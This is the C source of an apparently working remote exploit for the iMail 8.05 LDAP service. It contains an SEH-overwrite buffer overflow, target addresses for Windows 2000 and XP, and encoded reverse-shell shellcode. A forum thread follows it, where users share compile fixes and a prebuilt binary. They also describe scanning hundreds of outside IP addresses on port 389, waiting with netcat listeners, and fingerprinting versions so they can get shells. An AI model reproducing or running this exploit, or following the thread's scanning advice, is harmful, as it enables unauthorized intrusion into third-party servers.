/******************************************************************/
/* [Crpt] iMail v8.05 LDAP service remote sploit by kralor [Crpt] */
/******************************************************************/
/* (filtered) iDefense */
/* (filtered) k-otik */
/* (filtered) private exploits */
/* in other words, (filtered) you all security money makers and */
/* private exploits exchangers. */
/* lolo xXx for her patience while these long nights coding */
/* and for errr.. you know what */
/******************************************************************/
/* informations: www.coromputer.net,irc undernet #coromputer */
/******************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#pragma comment (lib,"ws2_32")

// EBP+~0xB6 (ebp+ecx-4) (Structed Exception Handler)
#define SEH_ADDR 0x50FFFFFF

/* for win2k offset:
--- jmp dword ptr [ebx]
*/
#define HIJACKED_2K_EVL 0x0043BD8B // (8.05 eval)
#define HIJACKED_2K_EXP 0x1000F7B0 // (8.05 express)
#define HIJACKED_2K_PRO 0x1000F7A9 // (8.05 pro (not sure ))

/* for winXP offset:
--- pop esi
--- pop ebx
--- ret
*/

#define HIJACKED_XP_EVL 0x0041F5C7 // (8.05 eval)
#define HIJACKED_XP_EXP 0x100106BC // (8.05 express)
#define HIJACKED_XP_PRO 0x100103CC // (8.05 pro) (not sure ))

// sequence of 4 opcodes
#define HOP 0xd4 // host opcode
#define POP 0xd7 // port opcode

int cnx(char *host, int port)
{
int sock;
struct sockaddr_in yeah;
struct hostent *she;

sock=socket(AF_INET,SOCK_STREAM,0);
if(!sock) {
printf("error: unable to create socket\r\n");
return 0;
}
yeah.sin_family=AF_INET;
yeah.sin_addr.s_addr=inet_addr(host);
yeah.sin_port=htons((u_short)port);

if((she=gethostbyname(host))!=NULL) {
memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
} else {
if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
printf("error: cannot resolve host\r\n");
return 0;
}
}
printf("[+] Connecting to %-30s ...",host);
if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
printf("error: connection refused\r\n");
return 0;
}
printf("Done\r\n");
return sock;
}

void banner(void)
{
printf("\r\n [Crpt] iMail LDAP service v3.12.10.3/v8.05 remote sploit by kralor [Crpt]\r\n");
printf("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n");
return;
}

void syntax(char *prog)
{
printf("\r\nsyntax: %s <host> <your_ip> <your_port> <version> [OSver]\r\n\r\n",prog);
printf("<version>\t0\t8.05 professional\r\n");
printf(" \t1\t8.05 express\r\n");
printf(" \t2\t8.05 evaluation\r\n---\r\n");
printf("[OSver] \t0\twindows 2000 universal [default]\r\n");
printf(" \t1\twindows XP universal\r\n");
exit(0);
}



int main(int argc, char *argv[])
{
int sock,bytes,target,osver=0;
WSADATA wsaData;
char buffer[8095];
unsigned long host,port;
unsigned int i;
char req1[] =
"\x30\x82" /* bind request */
"\x0a\x3d" /* bind req len */
/* msg id */
"\x02" /* integer */
"\x01" /* length */
"\x01" /* value */
"\x60" /* bind request */
"\x82" /* msg length 2bytes */
"\x01\x36" /* msg length */
/* LDAP ver */
"\x02" /* integer */
"\xff" /* length */
"\x03" /* value */
"\x05\x00" /* DN NULL */
"\x80\x00"; /* Auth simple */

char shellc0de[] = /* sizeof(shellc0de+xorer) == 334 bytes */
/* classic xorer */
"\x90"
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
"\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa"
/* reverse remote shell */
"\x14\x79\x05\x94\x95\x95\x1e\x61\xc0\xc3\xf1\x34\xa5\x95\x95\x95"
"\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e\x50\xcb\xc8"
"\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95\x95\xfd\xa6"
"\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d\xc2\xfd\x4c"
"\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4\xc4\xd4\xc4"
"\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5\x7d\xec\x95"
"\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e\x59\xff\x85"
"\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3\xa5\x6a\xa3"
"\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b\x16\x79\xc1"
"\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68\x53\xd1\xb1"
"\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1\x1c\xd1\xb1"
"\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85\xc1\xc5\xc4"
"\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b\x6a\xa3\xfd"
"\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0\xc3\xc2\x1e"
"\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e\xdf\x8d\x1e"
"\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6\x6a\x69\xa6"
"\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67\xae\xe9\xb1"
"\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e\xcf\x89\x96"
"\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca\xcb\xc8\xce"
"\x57\x91\x95";

banner();

if(argc<5||argc>6)
syntax(argv[0]);

host=inet_addr(argv[2])^0x95959595;
port=atoi(argv[3]);

if(!isdigit(argv[4][0])||strlen(argv[4])>1) {
printf("error: <version> must be one digit\r\n");
syntax(argv[0]);
return -1;
}
target=atoi(argv[4]);
if(target<0||target>2) {
printf("error: <version> must be 0, 1 or 2\r\n");
syntax(argv[0]);
return -1;
}
if(argc==6) {
if(!isdigit(argv[5][0])||strlen(argv[5])>1) {
printf("error: [OSver] must be one digit\r\n");
syntax(argv[0]);
return -1;
}
osver=atoi(argv[5]);
if(osver<0||osver>1) {
printf("error: [OSver] must be 0 or 1\r\n");
syntax(argv[0]);
return -1;
}
}
if(port<=0||port>65535) {
printf("error: <port> must be between 1 and 65535\r\n");
syntax(argv[0]);
return -1;
}
port=htons((unsigned short)port);
port=port<<16;
port+=0x0002;
port=port^0x95959595;

for(i=0;i<sizeof(shellc0de);i++) {
if((unsigned char)shellc0de[i]==HOP&&(unsigned char)shellc0de[i+1]==HOP)
if((unsigned char)shellc0de[i+2]==HOP&&(unsigned char)shellc0de[i+3]==HOP) {
memcpy(&shellc0de[i],&host,4);
host=0;
}
if((unsigned char)shellc0de[i]==POP&&(unsigned char)shellc0de[i+1]==POP)
if((unsigned char)shellc0de[i+2]==POP&&(unsigned char)shellc0de[i+3]==POP) {
memcpy(&shellc0de[i],&port,4);
port=0;
}
}

if(host||port) {
printf("error: unabled to find ip/port sequence in shellc0de\r\n");
return -1;
}

if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error: unable to load winsock\r\n");
return -1;
}

sock=cnx(argv[1],389);
if(!sock)
return -1;
/* <----- magic packet -----> */
strncpy(buffer,req1,13);
memset(&buffer[13],0x90,7010);
*(unsigned long*)&buffer[13] = SEH_ADDR;
if(!osver) {
if(!target)
*(unsigned long*)&buffer[17] = HIJACKED_2K_PRO;
else if(target==1)
*(unsigned long*)&buffer[17] = HIJACKED_2K_EXP;
else
*(unsigned long*)&buffer[17] = HIJACKED_2K_EVL;
} else {
if(!target)
*(unsigned long*)&buffer[17] = HIJACKED_XP_PRO;
else if(target==1)
*(unsigned long*)&buffer[17] = HIJACKED_XP_EXP;
else
*(unsigned long*)&buffer[17] = HIJACKED_XP_EVL;
}
*(unsigned long*)&buffer[21] = 0x90909013; // to avoid 0x00 <unwanted instructions> on winXP
memcpy(&buffer[200],shellc0de,sizeof(shellc0de)-1);
memcpy(&buffer[7000+23],&req1[10],4);
printf("[+] Sending magic packet ...");
bytes=send(sock,buffer,sizeof(buffer)-1,0);
printf("Done\r\n");
if(bytes==0) { printf("error: send()\r\n"); }
closesocket(sock);
return 0;
}


/******************************************************************
when compiling, here's the error I get....can some one please tell me what's wrong

Wedit output window build: Thu Feb 19 11:19:09 2004
Error c:\lcc\projects\gso\robot.c 53 undefined reference to _socket@12
Error c:\lcc\projects\gso\robot.c 59 undefined reference to _inet_addr@4
Error c:\lcc\projects\gso\robot.c 60 undefined reference to _htons@4
Error c:\lcc\projects\gso\robot.c 62 undefined reference to _gethostbyname@4
Error c:\lcc\projects\gso\robot.c 71 undefined reference to _connect@12
Error c:\lcc\projects\gso\robot.c 210 undefined reference to _WSAStartup@8
Error c:\lcc\projects\gso\robot.c 241 undefined reference to _send@16
Error c:\lcc\projects\gso\robot.c 244 undefined reference to _closesocket@4
search
Compilation + link time:1.2 sec, Return code: 11

thanks

w0rks fine to compile with m$ 6.0 !

anybody knows which port to scan?

in the souce code I found:

port: 26 ?!?

-fre4k


edit//

I have scan for port: 26 and it works.... I can connect

[+] Connecting to 212.100.*.* ...Done
[+] Sending magic packet ...Done


but n0 shell, i go on....

hi,
i always do it this way when coding with socks:

i've comiled it without any problems with VS++

ill post the exe in the file section.

Big thanks to Kralor and the Coromputer team
i've compiled the source code with VC++
imail.exe (155ko)

(studnikov you must scan port 389)

Anybody with problems in compilin´try:

#include <ctype.h>

Should help

Sounds cool, again a cool exploit from kralor

I've compiled succesfully, but when I try some ranges I don't get any shell.

anybody got a shell yet?
thx for the compiled one!
I dont get a shell and you??

many thanks to kralor there good these moments keep that up!!!

thx kralor , unn4m3d no shell for the moment its strange

nice m8te thx for the compilation

For all they have problems using LCC to compile it ..
check the make file generated by LCC !!
add the following lib and it works fine

LIBS=wsock32.lib
EXE="xxx.exe"

that's all .. usualy LCC ask U to import the missing lib's but sometimes it's buggy

C'ya
Steven

also no shell yet.

I was just thinking, maybe it's more clever to scan on port 8383. I saw in google imail servers running on that port. Just gonna give that a try.

this sploit works great but you must know
the OSver and imail ver
someone know how get the imail version?
the banner doesn't give the version...

sploit works really great for me ...... thx a lot!

i've tested it on my local imail server and it works
you must run netcat with <-lvp port> argument

sounds very intersting, anyone knows a good scanner, which shows me both versions from the OS and from the ldap?

solong

I also Scanned port 389 ..... got a few results but same with all of them

[+] Connecting to *.*.*.* ...Done
[+] Sending magic packet ...Done

C:\>


no Shell

soo I dont know too which port is to scan pls find it out...

No Shells here... using NetCat "-l -vv -p PORT' but can't figure out what version and OSver to choice....

Got some results from P389 scans, but no shells...

Anybody with good results who would be so kind to explain a little more (for example HOW to check the scans for vuln's ??)

checked alot of ip'z and no shell..
karlor thx any way

same here checked quite a lot and nothing thanks anyhow

Anyone have a working linux version of this yet? (I dont have windows on any systems I actually use.)

also no results for me
tried like 300 ips; no shell

I also tried a lot of checked Imail ips. Netcat didn't return any shell.

In the source code is written:
#define HIJACKED_2K_PRO 0x1000F7A9 // (8.05 pro (not sure ))
Has anyone tested if 0x1000F7A9 is correctly?

I see many autohaxors in private.

Ok already posted this @coromputer here is it again:
ok guys got the problem
listen up: As soon as you exploit this server ONCE no matter if you put in xp, 2k or eval/pro bla bla the ldap server stops AFTER exploitation!
So if you once exploit an ip with the wrong os/version settings it will not work again until the service is restarted/computer rebooted!
you need to know which os and which version you exploit or else you can forget it..
only had this problem on my local machine so far

ohh, thx sedolf! i have used an autohaxxor and wondering why i didn't get a shell...

But you can't find out wht version and os the remote pc uses, so it is luck to get a shell...?

Thank u all
Trying ... if I have succes i will post here .. thank again

thanx mates
gonna test it out

no shell arrive and i tried to check the imail version but nothing tools work :/

Seems a good idea to get a scanner who reads the OS.
Gonna try that for sure.
Thnx for the info.

port 389 = standart LDAP for SMTP
if you banner check your port 389 scans with scanline on port 25 you can see which smtp server is running there.
if you get verrrrry lucky and imail is there (very few imail out there) then you HAVE to find out Os and version or else it crashes after first exploitation (you maybe have a chance before because it crashes like ~3 secs after exploit) so if you know os and hack very fast version 0, 1, 2 with autohacker you could get a shell maybe
if it was version 8.05 (newest) you will 100% get a shell.
I could also imagine doing a banner scan on port 25 for *imail* with dsns

i will try it too, great sploit and great work from kralor!

@Sedolf

thx for this great information

Very good work, thanks for sharing such a tool with us

hum we need check LDAP on port 389 and Imail on port 25
thanks for all informations